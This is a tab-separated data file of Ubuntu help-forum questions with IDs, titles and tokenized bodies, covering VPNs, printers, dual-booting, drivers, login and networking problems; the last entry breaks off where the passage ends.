442272	can i have only one program access my vpn ?	currently i have two computers , both running ubuntu . both computers connect to the same isp , but with one i use a vpn service . for reasons not relevant to this question , i am considering getting rid of the vpn computer and consolidating all my tasks to the other computer . however , i would still like to use the vpn service for some programs , but not all . with my current set up , on the computer i am keeping , i can click on the network icon in my panel ( gnome classic ) and toggle my vpn on and off . however , this is global and affects all internet connections from all programs . this is not ideal . the vpn service , while offering privacy and access to services otherwise unavailable in my area , is slower than my non-vpn connection . what i 'm after is a situation like this : i 'm using firefox , and i 'm also using clementine for streaming radio . i then want to open chrome and have chrome access the internet via the vpn . ideally , chrome is set up so that it automatically uses the vpn without me having to turn it on and off . however , i want firefox and clementine to continue accessing the net directly , not switch over to the vpn service . is this possible ? if so , how ?
442277	canon pixma mp610 wo n't print test page ubuntu 13.10	i installed 13.10 , connected my canon pixma mp610 printer & the system installed it . the test page printed . that seems normal . 2 days ago i needed to print a medical report which was in pdf format . the pdf program has no printing facility ( a major drawback in my opinion ) . i tried using ctrl p & asking for the file to print . i asked but the file never printed . finally after looking at a ton of suggestions which did n't work for me , i printed the report using xp . i then discovered that it had become impossible to print any format , not just pdf . i tried a quick & dirty windows trick - i reinstalled 13.10 ubuntu because i thought i 'd waste less time than trying to fix it . now even the test page does n't print . i asked for a test page 20 minutes ago & it says the print status is `` processing '' . as someone here remarked `` it depends on whether you want to do a job with your computer or spend your time tinkering with it . '' i want to do a job & i already wasted 2 days .
442279	black screen in my vm after usb mount	i installed linux within vmware player . i needed to use usb key within my vm . after i mounted it ( using the menu interface ) , each time i try to restart my vm or even close vmware player and open it againt to restart my vm i see only a black screen : ( how can i log into my vm and remove away this black screen ? thank you for any help . regards
442281	ubuntu will not boot after trying to install windows 8	i am running the last version of ubuntu . i was trying to install windows 8 to do a dual boot with ubuntu . the only disk i had was a windows 8 recovery disk . the disk ran for a while , then the message : bios is not uefi appeared . i took the disk out , and now ubuntu will not boot . i just get a black screen with a blinking cursor . what do i do now ?
442286	reasonable partition scheme for windows 7 ultimate/ubuntu dual boot with ssd and hdd	i 've just completed a new build and i am planning to install and use linux for the first time in the form of a dual boot with windows 7 ultimate & the latest ubuntu release . i intend to use a 120gb ssd for the os 's and most applications , and to store other data on a 1tb hdd . after scouring forums on the topic of partitioning drives for this sort of dual boot , i 've come up with the following partition scheme , and i am looking for feedback on it : ssd - 120gb ( samsung 840 evo ) : [ c : ] 60gb ( ntfs ) - > windows system partition [ sda1 ] 20gb ( ext4 ) - > / [ sda2 ] 10gb ( ext4 ) - > /home ... ( symbolic links to folders for docs , media files , etc moved to hdd ) [ sda3 ] 10gb ( ext4 ) - > /usr ~20gb - > unallocated hdd - 1tb ( western digital caviar blue ) [ d : ] ~700gb ( ntfs ) - > windows data partition [ sdb2 ] ~300gb ( ext4 ) - > ubuntu data partition ( folders for docs , media files , etc moved from /home on ssd ) [ sdb3 ] 4gb ( ext4 ) - > /var [ sdb4 ] 8gb ( ext4 ) - > /swap ( = my 8gb ram ) questions is this partition scheme reasonable for what i 'm trying to do and my usage ( usage described below ) ? are each of the partition sizes reasonable and appropriate ? do i need a /boot partition ? am i missing any other advisable partitions or including unnecessary ones ? i 've read conflicting advice about leaving unallocated space on ssds . is this necessary ? would i be better off allocating some/all of that space to windows , or something else ? is it a better practice to create a separate ntfs partition on hdd for data sharing between the windows/ubuntu than to just access the `` windows data '' ntfs partition from ubuntu ? if i am misunderstanding anything please let me know that too . notes about my usage : i will be using windows 7 for most day-to-day work as well as 3d computer graphics work ( applications such as maya , unity ) . i will be using ubuntu , initially , for some software development work ( nothing very intense ) and for learning more about linux in general . i hope to use ubuntu more and more as time goes on and hope to have some headroom for both os 's .
442287	vm with black screen after remastersys installation	i installed the same vm in virtualbox and vmware player . in both of them , when i installed remastersys , i got a black screen for my vm : ( how can i fix this ?
442288	not able to login with lightdm	i am using ubuntu 13.10 with unity desktop . unfortunately i am not able to log into my desktop . after entering correct password it keeps looping back to login . could you please help me to sort out this problem ? i need help because i have important data in my laptop and i do n't want to reinstall the os . this is my /etc/lightdm/lightdm.conf file : [ seatdefaults ] user-session=unity greeter-session=unity-greeter this is the output of output after lspci|grep vga : - 00:02:0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c )
442289	how to login to 'ubuntu cloud guest ' images ?	i 've just started up with openstack . i 've launched a new instance with an ubuntu cloud guest image . it 's the precise amd64 image here : http : //cloud-images.ubuntu.com/precise/current/precise-server-cloudimg-amd64-disk1.img how to login ? i did provide openstack with an ssh key that it supposedly injected into the instance , but when i try to ssh into the instance , i get a refused connection ( maybe ssh server is n't running ? )
442290	how can i upgrade major kubuntu versions by command line ?	the recommended way to upgrade kubuntu versions is using kubuntu-devel-release-upgrade , which opens up a gui window . is there a purely command-line method for distribution upgrades ? background when attempting to upgrade using the gui , it progressed through `` preparing to upgrade '' , `` setting new software channels '' and `` getting new packages '' , and then stalled on `` installing the upgrades '' . a window popped up saying : could not install the upgrades . the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . i clicked `` ok '' ( or was it `` close '' ? ) , and the gui now was stuck at 45 % . i could no longer scroll the in-built terminal output , and the gui window appeared to be stuck . looking at the terminal from which i launched kubuntu-devel-release-upgrade , i can see configuration file '/etc/apport/crashdb.conf' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . this launch-terminal did not accept input . i killed the gui process from the launching terminal , then ran dpkg -- configure -a , which seems to continue where i left off , presenting me again with the above query . from the gui , it seemed like there were two more steps : `` cleaning up '' and `` restarting the computer '' . is the former merely sudo apt-get -- purge autoremove and sudo apt-get autoclean ? i presume that this hang was due to the gui `` distribution upgrade '' window being unable to accept text input . in the future , is there a purely command-line method for distribution upgrades ?
442291	compilation of logstalgia : compilation - undefined reference to symbol 'glend '	i 'm trying to build logstalgia https : //github.com/acaudwell/logstalgia.git cflags= '' -o2 -wall -march=native -i/opt/amdapp/include '' ldflags= '' -l/opt/amdapp/lib/x86_64 '' ./configure -- enable-ttf-font-dir=/usr/share/fonts/truetype/freefont/ and than , # make g++ -std=gnu++0x -wall -wno-sign-compare -wno-reorder -wno-unused-but-set-variable -wno-unused-variable -g -o2 -l/opt/amdapp/lib/x86_64 -o logstalgia src/logstalgia-ncsa.o src/logstalgia-ball.o src/core/logstalgia-conffile.o src/core/logstalgia-display.o src/core/logstalgia-frustum.o src/core/logstalgia-fxfont.o src/core/logstalgia-logger.o src/core/logstalgia-ppm.o src/core/logstalgia-png_writer.o src/core/logstalgia-plane.o src/core/logstalgia-quadtree.o src/core/logstalgia-regex.o src/core/logstalgia-resource.o src/core/logstalgia-sdlapp.o src/core/logstalgia-seeklog.o src/core/logstalgia-settings.o src/core/logstalgia-shader.o src/core/logstalgia-shader_common.o src/core/logstalgia-stringhash.o src/core/logstalgia-texture.o src/core/logstalgia-timezone.o src/core/logstalgia-vbo.o src/core/logstalgia-vectors.o src/logstalgia-custom.o src/logstalgia-logentry.o src/logstalgia-logstalgia.o src/logstalgia-main.o src/logstalgia-paddle.o src/logstalgia-requestball.o src/logstalgia-settings.o src/logstalgia-slider.o src/logstalgia-summarizer.o src/logstalgia-textarea.o -lglu -lfreetype -lpcre -lglew -lsdl_image -lsdl -lpng12 /usr/bin/ld.bfd.real : src/core/logstalgia-fxfont.o : undefined reference to symbol 'glend' /usr/lib/fglrx/libgl.so.1 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make : *** [ logstalgia ] error 1 am i missing linking options ?
442293	i ca n't install ubuntu from iso but can from magazine cover disks .	i have an old win xp with celeron processor . i have tried to install numerous flavours of linux and the only one i can get to install from an iso on dvd is puppy , but i want ubuntu . strangely i can install from the free disks given away with linux magazines . ( the problem is n't with my iso discs because they work on my win 7 laptop ) on the pc i am having problems with , i get as far as the boot choices screen then it starts loading for a few minutes & then goes to black flashing screen with cursor . i have tried all the usual suggestions such as nomodeset etc all to no avail , yet install is straight forward off a magazine disc . any suggestions ?
442294	how to access personal ubuntu computer remotely	currently i am using ubuntu 14.04 lts and i want the steps to access my personal computer remotely without using team viewer . could you please help me for the same . is it possible to access my computer remotely when host is offline ? thanks , rohan
442295	postgresql server installation keeps failing due to postgresql-common error	the installation of postgresql server in ubuntu 12.04 fails . its seem to be due to incomplete configuration of postgresql-common package . i purged all packages related to postgresql , tried to reinstall postgresql-common package only . still error was occuring . the error is : $ sudo apt-get install postgresql-common reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : postgresql-common 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/96.5 kb of archives . after this operation , 442 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package postgresql-common . ( reading database ... 176855 files and directories currently installed . ) unpacking postgresql-common ( from ... /postgresql-common_129ubuntu1_all.deb ) ... adding 'diversion of /usr/bin/pg_config to /usr/bin/pg_config.libpq-dev by postgresql-common' processing triggers for ureadahead ... processing triggers for man-db ... setting up postgresql-common ( 129ubuntu1 ) ... adduser : the user `postgres ' does not exist . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgresql-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea how to overcome/solve this ? n.b : i updated and tried again , same error is occuring . i purged the postgresql related packages and tried to install both postgresql-8.4 and postgresql-9.1 , in both cases , it failed due to the dependency to postgresql-common package .
442299	how much disk space is allocated in ubuntu for a new user ?	how much disk space is allocated in ubuntu 12.04 if new user is added ? i have 500gb completely allocated for ubuntu . if a new user is added then how much disk space will be allocated for him ?
442303	remote invocation of shell script	there are two systems a and b. i have two shell scripts on a ( called as server ) . b has to call these shell scripts and only if b is authenticated a has to run shell scripts and send the output to b ( client ) . call to shell scripts will also include command line arguments . how to proceed ?
442305	keyboard stops responding during install	trying to install ubuntu on an older dell dimension 3000 desktop box , it stops responding at the keyboard . the kb works fine in bios and at the beginning of the install , but during the install , what i think is a kb icon appears in the upper right - and it stops responding and the num lock led turns off . i have tried a logitec ps2 , a usb and an ibm model m with ps2 plug - all are no go . all of these kbs work using the older winxp that i am trying to replace . btw , the usb mouse sometimes still responds . but when it does , there is a major delay . i have also tried running a different linux - a kapersky rescue cd with a gentoo linux - it also stops responding to the kb . but the usb mouse is still fine . i tested this with all 3 keyboards . any ideas ?
442317	mapping xfce4/xrdp sessions to users	i have ubuntu 13.10 with xubuntu desktop - xfce4 . i 'm trying to use xdrp to allow ms windows users to login to the machine with their own user . i 've been a lot around the houses with this ! i 've find two half-way solutions , but ca n't get them to work as i 'd like ... 1 ) in /etc/xrdp/xrdp.ini i set the port to -1 [ xrdp1 ] name=sesman-xvnc lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=-1 each time any user logs on they get a new session - they can never go back to their original session 2 ) in /etc/xrdp/xrdp.ini i set the port to 5912 ( e.g ) [ xrdp1 ] name=sesman-xvnc lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=5912 each time any user logs on they always log on to the same session irrespective of their logon details ? ? ) i found a mid-way solution , to create a lot of sessions by adding adding additional options in the xrdp.ini e.g . [ xrdp8 ] name=bob 's logon lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=5913 [ xrdp9 ] name=jill 's logon lib=libvnc.so username=ask password=ask ip=127.0.0.1 port=5914 and so on , but he problem with this is that jill can still log into bob 's remote session ? ? ? is it possible to to do what i 'm trying to do ? maybe i have to use different tools ?
442318	how do i add interface aliases using network manager gui ?	i have seen numerous tutorials for creating network interface aliases ( for assigning multiple ipv4 addresses to a single interface ) , but i seem unable to find one for using the network manager gui . is it even possible ? or is network manager yet to support this feature ?
442319	ubuntu terminal ( xfce ) : making input commands different font color from output text	i 'm running ubuntu from inside a virtualbox ( host=win xp ) , and use the terminal ( xfce terminal emulator v0.4.8 ) in order to issue commands to freesurfer , an analysis software package . the problem is that these commands issue a lot of text , and it 's very hard to scroll up and find my initial command , because all the text is of the same color ( white ) . i 've used other terminals where the input/output lines were differently colored , allowing an easier detection of your own issued commands as opposed to output text . i checked the terminal options but did not see anything helpful ( i can not attach a screenshot so i 've uploaded it here : http : //www.2shared.com/photo/rkjbtpq6/20140402_12-23-42.html ) . would appreciate any help on how i can increase the visibility ( discriminability ) of the different types of text ( input/output ) in the terminal window , thanks !
442322	desktop icons dissapearing and windows not opening up	this is my third time asking this question . as soon as i log in desktop icons disappear and none of the windows open up . if they open up the close down immediately . right after that my computer freezes up . seems like an error with nautilus . this has made working on the laptop really impossible . i do n't know the solution to this . please help asap . it 's a recurring problem .
442331	déjà dub `` restore failure ''	i keep on getting the following failure while trying to restore my back up : backup location ‘/media/rick/3d8a-5060/duplicity-full.20140102t163252z.vol445.difftar.gz’ does not exist i understand that there 's a file missing , but what can i do to force déjà dup to continue restoring ? because , the process stops midway , but my most important files are n't yet restored by then . or does this error message mean that all files , besides the ones already restored , have gone ?
442336	ubuntu is using intel compatible controller instead of nvidia	i 'm trying to run minecraft on my ubuntu 12.04 but i 'm having the following error : [ 08:04:00 info ] : client > org.lwjgl.lwjglexception : could not init glx [ 08:04:00 info ] : client > at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at org.lwjgl.opengl.linuxdisplaypeerinfo . ( linuxdisplaypeerinfo.java:61 ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:818 ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at org.lwjgl.opengl.display.create ( display.java:846 ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at org.lwjgl.opengl.display.create ( display.java:757 ) ~ [ lwjgl-2.9.1.jar : ? ] [ 08:04:00 info ] : client > at azl.ad ( sourcefile:312 ) [ 1.7.5.jar : ? ] [ 08:04:00 info ] : client > at azl.f ( sourcefile:696 ) [ 1.7.5.jar : ? ] [ 08:04:00 info ] : client > at net.minecraft.client.main.main.main ( sourcefile:148 ) [ 1.7.5.jar : ? ] [ 08:04:01 info ] : client > xlib : extension `` glx '' missing on display `` :0 '' . looking around the net , i found out my nvidia drivers are not being used , using the following command : lsb_release -a & & lspci -vmk | grep -a 8 -b 2 vga & & lspci | grep vga & & glxinfo | grep -w 'direct\|opengl' i get : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise device : 00:02.0 class : vga compatible controller vendor : intel corporation device : 4th gen core processor integrated graphics controller svendor : hewlett-packard company sdevice : device 1966 rev : 06 driver : i915 module : i915 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) xlib : extension '' glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display '' :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension '' glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . how can i get the right driver installed and used by default ? btw , in the additional drivers section i see the nvidia driver , but it says that the driver is installed but not being used .
442338	low graphics mode while trying ubuntu 12.04 lts	i am new to ubuntu and dont know much about it . i am now interested in trying it . i am not installing it , i am just trying it using the option `` try ubuntu '' using live cd . i have windows xp installed on my system , my system does not have a graphics card . when i select the 'try ubuntu '' option , it gets stuck in `` the system is running on low graphics mode '' error . i went to terminal using ctrl+alt+f1 , tried to clean the folder also but still no luck ? can someone please help me to solve this ? thanks
442342	wifi connecting to android tablet shows authentication problem	the wifi shared my ubuntu 13.10 using ap-hotspot when connected to my android shows authentication problem and never connected . and using the last comment from here ( how to share a wired internet connection with an android phone ? ) i tried in the terminal and the reply was this while authenticating shafeeque @ shafeeque : ~ $ sudo hostapd hostapd.conf configuration file : hostapd.conf failed to update rate sets in kernel module using interface wlan0 with hwaddr 20:68:9d:90:83:2a and ssid 'your_ssid_name' 123 wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : authenticated wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : associated ( aid 1 ) wpa : wpa_sm_step ( ) called recursively could not set station 00:74:05:00:22 : d0 flags for kernel driver ( errno=11 ) . wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : authenticated wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : associated ( aid 1 ) wpa : wpa_sm_step ( ) called recursively wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : deauthenticated due to local deauth request wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : authenticated wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : associated ( aid 1 ) wpa : wpa_sm_step ( ) called recursively wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : authenticated wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : associated ( aid 1 ) wpa : wpa_sm_step ( ) called recursively wlan0 : sta 00:74:05:00:22 : d0 ieee 802.11 : deauthenticated due to local deauth request any solution ?
442345	how can i simplify the finch interface ?	i am using finch , the text-based version of pidgin . it uses a library called gntrc to create a windowing interface in text . personally , i find it a bit complicated . is there a simpler text interface ?
442346	set scaling back to default	i accidentally set the scaling settings at 4 , and could n't reset them . is there any way to reset these settings back to default ? i 'm running a microsoft surface pro ( 10.6 '' , 1920x1080 ) , and i can not see the slider . i have tried all the ways people posted and this has n't worked . using pre-ubuntu 14.04 final beta ( beta 1 ) . so i am editing this post and hopes a moderator will unlock it because none of the answers work for me .
442347	ubuntu 14.04 - enable numlock on login	numlock is not activated in lightdm : https : //bugs.launchpad.net/ubuntu/+source/unity-greeter/+bug/1271953 workaround for ubuntu 13.10 : sudo apt-get install numlockx gksu gedit /etc/lightdm/lightdm.conf.d/50-unity-greeter.conf add greeter-setup-script=/usr/bin/numlockx on line to the end of file . in ubuntu 14.04 the file 50-unity-greeter.conf is missing . any ideas for a solution ?
442355	getting error while using `` bluez-test-input connect < device address > yes '' command to connect to a serial bluetooth module	i am using a usb bluetooth dongle on my machine . on the other end , i am having a serial bluetooth module connected to a micro-controller . on my machine side , i connected and installed my usb-bluetooth dongle using hciconfig tool . but when i am trying to connect it to the serial bluetooth module i am getting a error . i took following steps i ) bluez-simple-agent hci0 < address of the remote bluetooth module > ii ) bluez-test-device trusted < address > yes even when i tested by running bluez-test-device trusted < address > i get `` 1 '' which define that device is trusted . iii ) bluez-test-input connect < address > yes , i get a error file `` /usr/bin/bluez-test-input '' , line 40 in < moudle > input.connect ( ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , lie 70 , in __call__return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , lie 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , lie 651 , in __call__blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.unknownmethod : method `` connect '' with signature `` `` on interface `` org.bluez.input '' dose n't exist i do n't know what i am lacking . i found the similar issue here and here but did n't get ant solution . i had followed these links to connect a remote serial bluetooth device ( this one and this one )
442357	environment setup for importing a userdefined module	i am creating an user defined module an .so file and importing that in the python module . the functions in the library are not responding as expected . what are the environment variables to be set to include all the library paths and headers ? where exactly the .so file to be present ( i am placing in /usr/lib/python2.7/dist-packages ) ? is there any other settings need to done for referring the library paths and headers ?
442358	after dual ubuntu installation the boot screen does n't updated ?	today i tried to install lubuntu13.10 on ubuntu10.04 by creating a separate partition ( /dev/sda3 ) . but after installation the boot screen does n't updated . ie it only shows ubuntu10.04 ... while installing lubuntu13.10 i changed default boot path from /dev/sda1 to /dev/sda3 . is that the problem ? how to fix it ? ? update 1 : when run gparted i got : update 2 : when i run sudo update-grub : debconf : unable to initialize frontend : dialog debconf : ( dialog frontend requires a screen at least 13 lines tall and 31 columns wide . ) debconf : falling back to frontend : readline searching for grub installation directory ... found : /boot/grub searching for default file ... found : /boot/grub/default testing for an existing grub menu.lst file ... found : /boot/grub/menu.lst searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-2.6.32-30-generic found grub 2 : /boot/grub/core.img found kernel : /boot/memtest86+.bin replacing config file /var/run/grub/menu.lst with new version updating /boot/grub/menu.lst ... done when i run sudo os-prober : /dev/sda1 : windows 7 ( loader ) : windows : chain /dev/sda3 : ubuntu 13.10 ( 13.10 ) : ubuntu : linux
442364	trouble in installing broadcomm drivers ( without internet )	i had bought a new dell vostro 2520 with default os ubuntu 12.04 . few days back the i the wifi has not detected , - so i just deactivate the broadcomm driver through the `` system settings- > additional drivers '' - then try to activate it again.but its not activating - now there is no internet provision in my laptop . - my wifi is not detecting . - lan cable is just detecting but i cant able to access internet . - i tested the terminal command for any hardware interruption , every thing is fine . using `` rfkill list all '' how can i activate or install the broadcomm again without internet ? ? ? ? ? ? ? ? or i want to completely reboot the system . please give any suggestion ... ..
442369	how do i remove a line from my /etc/apt/sources.list ?	i have duplicate sources.list entry and i need to delete last line in sources.list . can you help me please ?
442370	which is the difference between `` cd ~ . '' and `` cd . ~ ''	i tried cd . ~ in terminal and i saw the same result as when i type cd ~ . i want to know how this is done . or better to say what is the priority of the arguments which comes after a command ?
442377	create a shared folder for group of users	i have created a group of users in my ubuntu server system , so that each one of them can log in through an ssh connection with his username and password . each user is `` locked '' in their home directory , and can not `` look up '' to any other folder in the system . what i want to do is to create a folder that will be accessible to all these users of this group , with full rights inside this folder for the users for the whole group , while retaining the rule that they should not be able to access any other folder in the system .
442380	disable fn functions on keyboard	i have a laptop ( lenovo thinkpad t540p ) with dualboot windows and ubuntu ubuntu 12.04.4 lts . i need to make frequent use of the f keys ( f1 through f12 ) , but i must always press in the combination fn + f1-f12 and it 's getting annoying . this happens only on ubuntu so i 'm guessing there should be a setting in ubuntu which i can modify . i have tried the two solutions from these answers but i do n't have a .xinitrc file and xkeycaps does n't do the trick . i have also tried the solaar answer but it does n't show any device.. in short : f1 mutes my sound while fn + f1 brings up the help and i want it the other way around -- edit april 14 i have included a screenshot of my bios with the available options for keyboard/mouse as you can see : i only have three available options .
442384	ubuntu 12.04 lts installer does not recognize windows 7	i have been struggling with this for about 10 days with no luck . so after numerous installs of both oss i now feel i need some help . i know there are many versions of this question posted already but none has worked for me so far . my system has 3 hdds ( 2*tgb , 1*250gb ) and 1ssd and i want to install windows on the ssd and ubuntu on the 250gb hdd . i also want the windows 7 swap file on a partition on the 1st 1tb hdd ( correct me if i 'm wrong but i think having the swap file on the ssd is not a good idea ) and 3 partitions on the 250gb hdd : root , home and swap . the second 1tb hdd is contains loads of files i really must not lose . currently , i have installed windows 7 on ssd but when i try to install ubuntu 12.04 alongside it , windows is not recognized so i do n't get that option . in the past couple of days i did have both working but i could n't get grub to see windows and had to switch using uefi . ubuntu @ ubuntu : ~ $ sudo parted -l model : ata wdc wd10ezrx-00a ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 16.8gb 16.8gb ntfs 2 16.8gb 1000gb 983gb ntfs model : ata wdc wd10ezrx-00a ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs model : ata wdc wd2500aajs-0 ( scsi ) disk /dev/sdc : 250gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags model : ata samsung ssd 840 ( scsi ) disk /dev/sdd : 500gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 106mb 105mb fat32 efi system partition boot 2 106mb 240mb 134mb microsoft reserved partition msftres 3 240mb 500gb 500gb ntfs basic data partition warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! ubuntu @ ubuntu : ~ $ edit- using gparted , i can see the screen bellow : gparted i am not sure what the unknown file system on sdd2 is . thanks a lot in advance .
442386	disable auto login so i can choose desktop environment	i 've installed gnome-session-fallback on my ubuntu gnome 14.04 beta , after that i logged out and logged in selecting gnome classic ( compiz ) but some how it is screw up ... and the only thing i see is the wallpaper and nothing more . to quit i have to force shutdown by pressing button of my laptop . now , i want to select the default desktop environment of ubuntu gnome , but i ca n't access to login screen because i have autologin option active ... what should i do ? i have tried recovery mode and : sudo apt-get -- purge gnome-session-fallback but it gives me an error..
442387	undo apt-get remove open* ubuntu 12.04	i am running a linux instance on ec2 , snap sorting of image is disabled . while trying to un-install open-jdk from the system . i stupidly run the command sudo apt-get remove open* it started removing many packages , so i stopped the process by ctrl+c . i did it twice : sudo apt-get remove open* sudo apt-get remove openjdk* i stopped the process ( ctrl+c ) in between for both of them . now i see that my other application are not working , because of the packages removed . please advice , how can i go back to the state before apt-get remove . thanks in advance .
442390	ubuntu keyboard shortcut guidelines ?	is there an authoritative specification of keyboard shortcut guidelines for ubuntu ? i am looking for something like the os x guidelines that result in unified application behaviour for common things like accessing the app 's preferences , closing an app window , quitting the whole app etc . if something like this does not exist , where would be the best place to create it and recommend it to application developers in a similar way to e.g . the ubuntu design guidelines ? what community body ( community council ? bdfl ? ) would have to approve such a document in order to be able to file bugs against applications that do not respect these guidelines ?
442392	why is bubbleupnp not connecting to my minidlna server ?	i 'm trying to stream video files from my ubuntu computer to my android tablet . my tablet is running bubbleupnp , and i 've just installed minidlna . i ca n't seem to access video from bubbleupnp . i 've followed a few different setup guides on the web , and they all seem to be pretty easy . follow a few configurations and start the service . my configuration file is here on pastebin . the error i get on bubbleupnp is `` the remote server could not be joined due to timeout . check that the server address is correct . '' i am certain i am using the right ip address , which is 192.168.0.2 , and i 've tried setting the port to 6544 wherever i could . in /etc/minidlna.conf there are the following errors and one warning : [ 2014/04/02 22:03:03 ] minidlna.c:898 : warn : starting minidlna version 1.0.24 [ sqlite 3.7.17 ] . [ 2014/04/02 22:03:03 ] minissdp.c:71 : error : setsockopt ( udp , ip_add_membership ) : address already in use [ 2014/04/02 22:03:03 ] minissdp.c:121 : warn : failed to add multicast membership for address 192.168.0.2 [ 2014/04/02 22:03:03 ] minidlna.c:1006 : warn : http listening on port 6544 can anyone suggest where i might be going wrong ?
442394	why does cd ~k ( & tab ) expands to cd ~kernoops when i already have a folder named `` ~kernel-ppa '' in pwd ?	i have a folder named ~kernel-ppa inside ~/downloads . aditya @ aditya-desktop : ~ $ cd downloads/ aditya @ aditya-desktop : ~/downloads $ ls ~kernel-ppa now when i type cd ~k and press tab for automatic expansion , the shell expands it to cd ~kernoops/ instead of cd ~kernel-ppa/ although the folder with same starting characters is already present . for automatic expansion to work , i need to escape it with \ . thus using cd \~k and pressing tab correctly expands it to cd \~kernel-ppa/ . even using cd \ and pressing tab does the trick . why is it so and why do i need to escape ? moreover , what am i escaping since even ~ is not required for automatic expansion ? if i go with the flow and run cd ~kernoops/ and press enter , the terminal status changes to // : aditya @ aditya-desktop : ~/downloads $ cd ~kernoops/ aditya @ aditya-desktop : // $ pwd // aditya @ aditya-desktop : // $ ls bin cdrom etc initrd.img lost+found mnt proc run srv tmp var boot dev home lib media opt root sbin sys usr vmlinuz aditya @ aditya-desktop : // $ this looks like the / directory , but pwd says it is // . what exactly is it ?
442395	kubuntu on a asus x551c fn keys not working	kubuntu is the only operating system on my asus x551c ; however , the fn keys not working : does n't sound like much of an issue ; however , this means that there is n't wifi , touchpad , sound toggle etc.. my questions are : ( 1 ) how can i configure my asus x551c laptop with kubuntu 13.10 so that my wifi automatically turns on whenever a internet cable is not connected . ( 2 ) how can i configure my asus x551c laptop with kubuntu 13.10 so that my touchpad and be toggled off and on . even better if the driver could be installed and configured as the touchpad does n't have two finger scroll and is very glitchy . in fact i had to type question on a winblows computer because typing is impossible with the touchpad glitching and popping/jumping the cursor all over the text box while typing . ( 3 ) how can i configure my asus x551c laptop with kubuntu 13.10 so that my battery , fan and power options can be toggled off and on and configured . this is a brand new laptop that comes with winblows 8 and i have installed winblows 7 and used http : //www.laptopish.com/1649/asus-x551ca-drivers-windows-7/ and configured all the asus x551c features in seconds ; so i can confirm that all the features work on winblows . every year i try to switch over to kubuntu and every year i give up and return to winblows . hopefully , this year one of my many computers will be using kubuntu or another flavor of ubuntu . many thanks in advance . the asus website http : //www.asus.com/notebooks_ultrabooks/x551ca/ does have a support > downloads drivers > other > support nb130 wlan card file but i do n't have the know how or the guts to know how to update/install the bios 209 ( x551cap ) or even to be sure if this file matches the sticker on the bottom of my laptop : x551c ; d9n0cx409441398 ; x551ca-bh91-cb ; contains : 1x1 802.11 b/g/n pcie module ; model number : atheros/ar5b125 update i have discovered the following to upgrade to kubuntu 13.10 ( a ) open terminal ( b ) sudo su enter ( c ) do-release-upgrade then unplug the internet cable ... reboot.. ( a ) open terminal ( b ) sudo su enter ( c ) sudo rfkill unblock all reboot a couple of times without internet cable plugged in ; and most of the functions work . i am not sure when everything started to work ( except sound + - does n't work ) but the wireless and the touchpad are much better now . yet , still not useable , applications > utilities > touchpad management either crashes and/or synaptiks does't acknowledge that your computer has a touchpad . oh and try this too : plug in your internet cable , close the lid/laptop screen and then remove the internet cable , then open the 